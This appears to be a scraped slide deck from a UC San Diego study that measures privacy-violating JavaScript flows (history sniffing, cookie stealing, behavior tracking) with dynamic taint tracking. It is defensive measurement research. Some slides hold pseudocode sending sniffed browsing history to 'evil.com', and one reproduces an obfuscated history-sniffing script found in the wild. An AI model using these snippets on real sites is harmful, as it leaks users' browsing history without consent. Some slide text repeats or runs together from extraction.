580 likes | 678 Views
An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications. Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham UC San Diego. ✗. Phishing. Location Hijacking. document.location. ✗. Identity Theft. Cookie Stealing. document.cookie. ✗.
E N D
An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications Dongseok Jang RanjitJhala Sorin Lerner HovavShacham UC San Diego
✗ • Phishing • Location Hijacking • document.location
✗ • Identity Theft • Cookie Stealing • document.cookie
✗ • History Sniffing JavaScript Visited Not-Visited
✗ • Behavior Tracking
How Prevalent Are Malicious Flows? • How to Detect Malicious Flows?
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
Flow Policies • Specify different types of flows
Policies:History Sniffing • 1. Create (invisible) link to a.com color depends on history • 2. Inspect link’s color style property color says if link was visited • 3. Send sniffed info over network
Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited);
Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited); doc.getStyle(link); • Inject Taints • (At confidential sources)
Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited); doc.getStyle(link); style visited style.color==“purple”; style.color==“purple” send(“evil.com”,“facebook=” + visited); • Propagate Taints • (At assignments, etc.)
Policies:History Sniffing • link = createLink(“facebook.com”); • style =doc.getStyle(link); • visited =style.color==“purple”; • send(“evil.com”,“facebook=” + visited); “cr=” + color • send(“evil.com”,“facebook=” + visited); • Block Taints • (At untrusted sinks)
Flow Policies • Inject • Block
Flow Policies • Inject • Block at doc.getStyle($1) ifisLink($1) inject“secret” • Taint style with “secret”
Flow Policies • Inject • Block
Flow Policies • Inject • Block at send($1, $2) block “secret” on $2 • Block tainted values to third-party
Flow Policies • Inject • Block atSite if Cond injectTaint atSite block Taint on Param
Flow Policies • Expressive • History Sniffing • Behavior Tracking • Cookie Stealing • Location Hijacking…
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
[Chander et al POPL 07] Dynamic Flow Tracking • Source • code Parse Rewrite Execute • AST • AST Dynamic Eval • Rewrite JS code to carry taints
Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewritten Code Add .taintfields Inject, Propagate, Block Taints
Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewriting Issues Boxing / Unboxing • Indirect Flows
Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewriting Issues Boxing / Unboxing • Indirect Flows
Dynamic Flow Tracking • Source • code Parse Rewrite Execute • AST • AST Dynamic Eval • Rewrite JS code to carry taints • Implemented in Chrome/V8
Dynamic Flow Tracking • Performance (Overhead)
Performance: Policies • Cookie Confidentiality • cookie doesn’t flow to 3rd party code • Location Integrity • locationunaffected by 3rd party code
Performance: Benchmark • 10 sites with the largest JS code base in Alexa top 100 • 15 – 31 Kloc (avg. 21Kloc)
Performance: Figures • Timing Overheads • Page load (avg: 2x) • JS execution (avg: 3x)
Performance: Upshot • High for online use • Acceptable for offline survey
Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions
Flows “In the Wild” • History Sniffing • Behavior Tracking
History Sniffing: Figures • Alexa Top 50,000 sites • 63 sites reported as sending history over network • 1 site in Alexa Top 100 • 46 sites were real cases
History Sniffing: Example var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...}; var g = []; for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) } } • Encrypted URLs • Decrypt URL • Create Link • 1 site in Alexa Top 100 • Inspect Color
doubleclick.net History Sniffing: Real Cases charter.net doubleclick.net interclick
History Sniffing: Real Cases gamestorrentsharrenmedianetworkmeaningtool
History Sniffing: Upshot • # of sniffed URLs: 8 to 222 • 46 of real cases • 39 had third-party sniffing code • 7 had home-grown code • Obfuscated sniffing code • Code was generated at runtime
Malicious Flows “In the Wild” • History Hijacking • Behavior Tracking
Behavior Tracking • Log user behavior by JS event handlers • Send log back to website
Behavior Tracking: Policy while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ... } onMouseOver = function(event) isMouseOver = true; } true
Behavior Tracking: Policy while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ... } e.isMouseOver() at $1.isMouseOver() inject“secret” at $1.isClick() inject“secret” …